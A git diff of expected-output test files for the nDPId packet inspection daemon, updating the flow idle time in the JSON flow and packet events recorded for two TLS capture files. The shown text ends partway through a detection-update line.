@@ -1,18 +1,18 @@ 00468{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1252380859868} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1252380859868,"flow_last_seen":1252380859868,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1252380859868,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1252380859868,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1252380859868,"pkt":"ABTRQblQABy\/OaVJCABFAAA0MFlAAIAG8ynAqAplziE9cQ9\/AbtzVLVxAAAAAIAC+vBjhwAAAgQFtAEDAwABAQQC"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1252380859868,"flow_last_seen":1252380859868,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1252380859868,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1252380859868,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1252380859868,"pkt":"ABTRQblQABy\/OaVJCABFAAA0MFlAAIAG8ynAqAplziE9cQ9\/AbtzVLVxAAAAAIAC+vBjhwAAAgQFtAEDAwABAQQC"} 00211{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","l4_data_len":32,"global_ts_msec":1252380859884} 
00367{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":66,"pkt_l4_len":0,"thread_ts_msec":1252380859868,"pkt":"ABy\/OaUlABTRQblQCABFIBA0ZLoAADYGSUrOIT1xwKgKZQG7D3++yAIvc1S1coASFtCGmAAAAgQFtAEBBAIBAwMx"} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1252380859884,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1252380859884,"pkt":"ABTRQblQABy\/PaVxCABFAAAoMP9AAIAG8zDAqAplziE9cQ9\/AbtzVLVyvsgCMFAQ+vDjSQAA"} -00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1252380859885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":156,"pkt_l4_len":122,"thread_ts_msec":1252380859885,"pkt":"ABTRQblQABy\/OaVxCABFAACOMQBAAIAG8snAqAplziE9cQ9\/AbtzVLVyvsgCMFAY+vBuTgAAFgMBAGEBAABdAwFKpdC7WffXCrqul0rRyqlV7PYgfbDHC7SZ1YAJU4BSeiCCetHfydzbddwggCw2Ef4Y\/Wcmum3i+DV+RW7iw5bCGwAWAAQABQAKAAkAZABiAAMABgATABIAJQAA"} 
-00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1252380859868,"flow_last_seen":1252380859885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1252380859885,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1252380859868,"flow_last_seen":1252380859904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":851,"flow_tot_l4_payload_len":953,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1252380859904,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"53611273a714cb4789c8222932efd5a7","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1252380859884,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1252380859884,"pkt":"ABTRQblQABy\/PaVxCABFAAAoMP9AAIAG8zDAqAplziE9cQ9\/AbtzVLVyvsgCMFAQ+vDjSQAA"} +00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1252380859885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":156,"pkt_l4_len":122,"thread_ts_msec":1252380859885,"pkt":"ABTRQblQABy\/OaVxCABFAACOMQBAAIAG8snAqAplziE9cQ9\/AbtzVLVyvsgCMFAY+vBuTgAAFgMBAGEBAABdAwFKpdC7WffXCrqul0rRyqlV7PYgfbDHC7SZ1YAJU4BSeiCCetHfydzbddwggCw2Ef4Y\/Wcmum3i+DV+RW7iw5bCGwAWAAQABQAKAAkAZABiAAMABgATABIAJQAA"} +00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1252380859868,"flow_last_seen":1252380859885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1252380859885,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1252380859868,"flow_last_seen":1252380859904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":851,"flow_tot_l4_payload_len":953,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1252380859904,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"53611273a714cb4789c8222932efd5a7","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} 00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":9,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","packets-captured":9,"packets-processed":7,"total-skipped-flows":0,"total-l4-data-len":1431,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1421985541772} 
-00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1421985541772,"flow_last_seen":1421985541772,"flow_idle_time":7440000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"74.80.160.99","dst_ip":"67.217.77.28","src_port":3258,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1421985541772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1421985541772,"pkt":"AAOf2SAhEFbKCIWJCABFAAAyM2VAAH8GFrhKUKBjQ9lNHAy6AbvQcb+g7Sa+J1AY\/QKZOwAlAAMBAAUBAAABAQ=="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1421985541772,"flow_last_seen":1421985541772,"flow_idle_time":7440000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"74.80.160.99","dst_ip":"67.217.77.28","src_port":3258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1252380859868,"flow_last_seen":1252380859943,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":851,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":204,"midstream":0,"thread_ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1421985541772,"flow_last_seen":1421985541772,"flow_idle_time":7560000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"74.80.160.99","dst_ip":"67.217.77.28","src_port":3258,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1421985541772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1421985541772,"pkt":"AAOf2SAhEFbKCIWJCABFAAAyM2VAAH8GFrhKUKBjQ9lNHAy6AbvQcb+g7Sa+J1AY\/QKZOwAlAAMBAAUBAAABAQ=="} 
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1421985541772,"flow_last_seen":1421985541772,"flow_idle_time":7560000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"74.80.160.99","dst_ip":"67.217.77.28","src_port":3258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1252380859868,"flow_last_seen":1252380859943,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":851,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":204,"midstream":0,"thread_ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00560{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":10,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","packets-captured":10,"packets-processed":8,"total-skipped-flows":0,"total-l4-data-len":1441,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":16,"global_ts_msec":1544035479538} 00195{"error_event_id":5,"error_event_name":"Unknown packet 
type","datalink":1,"packet_id":10,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1544035479538} 00449{"packet_event_id":1,"packet_event_name":"packet","packet_id":10,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":118,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":118,"pkt_l4_len":0,"thread_ts_msec":1421985541772,"pkt":"AAAAAAAFYAgQGhx\/gQBsn4EAYAIIAEVoAGDVegAA\/xG3XAruJEAK7vQxCGgIaABMAAAw\/wA8B+zklkUAADyx3UAAQAbcAwq\/ixE23eAt5LgBu\/kVfJ4AAAAAoAL\/\/3GmAAACBAW0BAIICgAUzUMAAAAAAQMDBg=="} 
@@ -20,7 +20,7 @@ 00444{"packet_event_id":1,"packet_event_name":"packet","packet_id":11,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":118,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":118,"pkt_l4_len":0,"thread_ts_msec":1421985541772,"pkt":"AAAAAAAFYAgQGhx\/gQAMn4EAAAIIAEVoAGBxLwAAOxHfqAru9DEK7iRACGgIaABMAAAw\/wA8AABhskUAADwAAEAA5Abp4Dbd4C0Kv4sRAbvkuBpaSBv5FXyfoBJxILDEAAACBAV4BAIICh1e0BYAFM1DAQMDCA=="} 00195{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":12,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1544035479768} 00723{"packet_event_id":1,"packet_event_name":"packet","packet_id":12,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":324,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":324,"pkt_l4_len":0,"thread_ts_msec":1421985541772,"pkt":"AAAAAAAFYAgQGhx\/gQBsn4EAYAIIAEVoAS7V9AAA\/xG2FAruJEAK7vQxCGgIaAEaAAAw\/wEKB+zklkUAAOux30AAQAbbUgq\/ixE23eAt5LgBu\/kVfJ8aWkgcgBgFWRb9AAABAQgKABTNax1e0BYWAwEAsgEAAK4DA+Jfj3VZ7Se+llOF2hoK\/0SOWa4JB8kGoFPipHXr6zI3AAAowCvALMAvwDAAngCfwAnACsATwBQAMwA5wAfAEQCcAJ0ALwA1AAUA\/wEAAF0AAAAWABQAABFlLmNyYXNobHl0aWNzLmNvbQAXAAAAIwAAAA0AFgAUBgEGAwUBBQMEAQQDAwEDAwIBAgMAEAALuImlL1Y1GeVflD5H40\/GlDV3w0Q4eHATzs15UMvq3bDFbT9WBxf4WY7WsXHZhuEm\/fgNJZccyFnwUKMb"} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1421985541772,"flow_last_seen":1421985541772,"flow_idle_time":7440000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"74.80.160.99","dst_ip":"67.217.77.28","src_port":3258,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1421985541772,"flow_last_seen":1421985541772,"flow_idle_time":7560000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"74.80.160.99","dst_ip":"67.217.77.28","src_port":3258,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":12,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","packets-captured":12,"packets-processed":8,"total-skipped-flows":0,"total-l4-data-len":1441,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":24,"global_ts_msec":1544035479768} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 12/8 diff --git a/test/results/tls_long_cert.pcap.out b/test/results/tls_long_cert.pcap.out index bd2e6439d..e400dc8cc 100644 --- a/test/results/tls_long_cert.pcap.out +++ b/test/results/tls_long_cert.pcap.out 
@@ -1,13 +1,13 @@ 00464{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tls_long_cert.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tls_long_cert.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1553619078033} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1553619078033,"flow_last_seen":1553619078033,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1553619078033,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1553619078033,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1553619078033,"pkt":"BBjWMe9aeDHBvV4kCABFAABAAABAAEAGN8XAqAJ+aG\/XXesOAbssL+yBAAAAALAC\/\/8wZwAAAgQFtAEDAwYBAQgKJK\/ZdwAAAAAEAgAA"} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1553619078058,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1553619078058,"pkt":"eDHBvV4kBBjWMe9aCABFAAA8AABAADYGQclob9ddwKgCfgG76w4xmkZeLC\/sgqAScSAcqQAAAgQFtAQCCArQt2rgJK\/ZdwEDAwc="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1553619078058,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1553619078058,"pkt":"BBjWMe9aeDHBvV4kCABFAAA0AABAAEAGN9HAqAJ+aG\/XXesOAbssL+yCMZpGX4AQCAq0dAAAAQEICiSv2Y7Qt2rg"} 
-00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1553619078033,"flow_last_seen":1553619078058,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1553619078058,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.repubblica.it","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1553619078033,"flow_last_seen":1553619078091,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1553619078091,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.repubblica.it","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-02429{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1553619078033,"flow_last_seen":1553619078093,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4613,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":1553619078093,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.repubblica.it","server_names":"www.repstatic.it,repstatic.it,amp-video.lastampa.it,www.repubblica.it,amp-video.deejay.it,amp-video.d.repubblica.it,www.gelestatic.it,oasjs.kataweb.it,video.d.repubblica.it,www.test.capital.it,napoli.repubblica.it,video.ilsecoloxix.it,genova.repubblica.it,cdn.gelestatic.it,video.gelocal.it,media.deejay.it,media.m2o.it,amp-video.espresso.repubblica.it,download.gelocal.it,amp-video.m2o.it,bologna.repubblica.it,torino.repubblica.it,scripts.kataweb.it,palermo.repubblica.it,roma.repubblica.it,video.xl.repubblica.it,amp-video.gelocal.it,video.espresso.repubblica.it,www.capital.it,video.limesonline.com,media.capital.it,syndication-vod-pro.akamai.media.kataweb.it,test.capital.it,video.deejay.it,video.repubblica.it,milano.repubblica.it,video.lanuovasardegna.it,video.m2o.it,parma.repubblica.it,video.3nz.it,syndication-vod-hds.akamai.media.kataweb.it,amp-video.repubblica.it,video.lastampa.it,webfragments.repubblica.it,amp-video.xl.repubblica.it,amp-video.limesonline.com,media.kataweb.it,bari.repubblica.it,syndication-vod-hls.akamai.media.kataweb.it,amp-video.3nz.it,syndication3rd-vod-pro.akamai.media.kataweb.it,firenze.repubblica.it,amp-video.ilsecoloxix.it,amp-video.lanuovasardegna.it,cdn.flv.kataweb.it","ja3":"66918128f1b9b03303d77c6f2eef